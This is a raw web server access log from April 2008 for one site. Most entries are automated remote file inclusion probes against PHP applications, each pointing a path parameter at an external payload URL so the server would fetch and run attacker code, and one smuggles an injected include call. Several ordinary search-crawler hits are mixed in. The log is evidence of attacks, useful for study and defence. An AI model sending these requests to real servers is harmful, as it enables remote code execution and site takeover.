211.220.195.20 - - [01/Apr/2008:05:08:48 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:08:53 -0700] "GET /logs/access_080219.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:08:55 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:05:09:01 -0700] "GET /logs/access_080124.log//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:05:09:01 -0700] "GET /logs//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:05:09:03 -0700] "GET /logs/access_071229.log//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:05:09:07 -0700] "GET /logs/access_080124.log//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:05:09:07 -0700] "GET /logs//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:05:09:08 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:09:13 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:09:18 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:10:10 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:10:10 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:10:10 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:10:16 -0700] "GET /logs/access_080128.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:10:17 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:10:17 -0700] "GET /index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:10:18 -0700] "GET /logs/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:10:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.192.202 - - [01/Apr/2008:05:10:22 -0700] "GET //login.php?dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:10:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:10:38 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:10:38 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:10:52 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.130.1 - - [01/Apr/2008:05:10:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.soscontacto.com.mx/rateme_v1.3.2/images/8.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.130.1 - - [01/Apr/2008:05:10:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.soscontacto.com.mx/rateme_v1.3.2/images/8.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:14 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:14 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:15 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:05:11:25 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:05:11:25 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:05:11:26 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:05:11:35 -0700] "GET /logs/access_080124.log//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:05:11:35 -0700] "GET /logs//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:05:11:37 -0700] "GET /logs/access_071229.log//portfolio/msg/view.php?av=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:39 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:39 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:50 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:11:51 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:12:22 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:12:26 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:12:48 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.249.108 - - [01/Apr/2008:05:12:51 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:12:51 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.195.36.29 - - [01/Apr/2008:05:12:52 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:13:03 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:13:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.19.151.104 - - [01/Apr/2008:05:13:15 -0700] "GET /logs/access_080215.log/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.104 - - [01/Apr/2008:05:13:15 -0700] "GET /main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.104 - - [01/Apr/2008:05:13:16 -0700] "GET /logs/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.28.163 - - [01/Apr/2008:05:13:24 -0700] "GET /logs/access_080313.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:13:35 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:05:14:16 -0700] "GET /logs/access_080215.log/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:05:14:17 -0700] "GET /main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:05:14:17 -0700] "GET /logs/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:05:14:46 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.192.202 - - [01/Apr/2008:05:14:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.111 - - [01/Apr/2008:05:15:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.97 - - [01/Apr/2008:05:15:43 -0700] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:05:15:48 -0700] "GET /logs/access_080215.log/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:05:15:48 -0700] "GET /main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:05:15:52 -0700] "GET /logs/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:16:50 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:16:50 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:16:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:16:56 -0700] "GET /logs/access_080312.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:17:05 -0700] "GET /logs/access_080215.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:17:08 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:17:13 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.93 - - [01/Apr/2008:05:17:26 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.106 - - [01/Apr/2008:05:17:26 -0700] "GET /bikes/dteel/2008_01_26/ HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:05:17:40 -0700] "GET /logs/access_080219.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:17:53 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:17:59 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.130.1 - - [01/Apr/2008:05:18:01 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.soscontacto.com.mx/rateme_v1.3.2/images/8.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:18:31 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.51.137 - - [01/Apr/2008:05:18:32 -0700] "GET /logs/access_080219.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.55 - - [01/Apr/2008:05:18:32 -0700] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:05:18:33 -0700] "GET /logs/access_080313.log/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:05:18:34 -0700] "GET /logs/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:19:40 -0700] "GET /logs/access_080211.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:05:19:55 -0700] "GET /logs/access_080117.log/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:20:16 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:20:22 -0700] "GET /logs/access_080312.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [01/Apr/2008:05:20:26 -0700] "GET /logs/access_080219.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:05:20:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.184 - - [01/Apr/2008:05:20:32 -0700] "GET /bikes/dteel/2008_01_26/?N=D HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.155 - - [01/Apr/2008:05:20:41 -0700] "GET /bikes/dteel/?D=A HTTP/1.0" 200 9501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:05:21:20 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.21.88 - - [01/Apr/2008:05:21:44 -0700] "GET /bikes/dteel/140CANON/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:22:18 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.96 - - [01/Apr/2008:05:22:49 -0700] "GET /bikes/dteel/2008_01_26/ZbThumbnail.info HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.31.158 - - [01/Apr/2008:05:22:57 -0700] "GET /logs/access_080219.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:05:23:09 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.130.1 - - [01/Apr/2008:05:23:16 -0700] "GET /logs/index.php?page=&lang=http://www.soscontacto.com.mx/rateme_v1.3.2/images/8.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:23:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.96 - - [01/Apr/2008:05:23:41 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:05:24:22 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.119 - - [01/Apr/2008:05:24:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.16.220 - - [01/Apr/2008:05:24:35 -0700] "GET /bikes/dteel/140CANON/?N=D HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.152.130 - - [01/Apr/2008:05:25:39 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [01/Apr/2008:05:25:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:05:25:49 -0700] "GET /logs/access.log//ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:05:25:50 -0700] "GET /logs//ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.106 - - [01/Apr/2008:05:26:21 -0700] "GET /bikes/dteel/EQ2/ HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
